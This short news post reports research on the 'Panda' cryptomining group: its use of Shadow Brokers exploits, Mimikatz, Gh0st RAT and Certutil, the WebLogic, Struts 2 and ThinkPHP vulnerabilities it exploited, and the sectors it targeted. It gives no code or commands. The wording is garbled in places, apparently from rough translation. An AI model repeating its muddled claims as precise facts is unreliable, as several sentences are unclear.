Hackers exploit exploits released by Shadow Brokers while using the open-source application Mimikatz to obtain codes access.
Initially, the Panda team was involved with last year's MassMiner campaign. He then joined another mining company campaign. Lately, the Panda team has developed a lot of its techniques and exploits and payloads.
According to researchers, hackers have attacked organizations in various sectors. Some of the goals are banks, services healthcare, telecommunications companies and IT services.
In July of 2018, hackers took advantage of a vulnerability WebLogic (CVE-2017-10271) to install a cryptominer associated with MassMiner. Furthermore, massively scanned the internet to find the vulnerable servers and attempted to exploit an Apache Struts 2 vulnerability (CVE-2017-5638). They then used a PowerShell exploit to install the miner payload.
Talos estimates that Panda has teamed up Monero worth 100.000 dollars.
It has also been found that the team has used Gh0st RAT in its attacks.
In January of 2019, hackers had exploited a vulnerability in the ThinkPHP web framework (CNVD-2018-24942) to spread malware. Other exploits were used in March but the tactics, techniques and procedures were similar, so the researchers they realized that they were the hackers themselves.
The Panda team then used another payload, which used the Certutil tool in Windows to download the secondary payload.
However, Panda doesn't care much for her security of. Many of the old and new domains are hosted on the same IP address and their TTPs are similar in all their campaigns. Finally, their payloads are not very complex.
How useful was this post?
Average rating / 5. Vote count: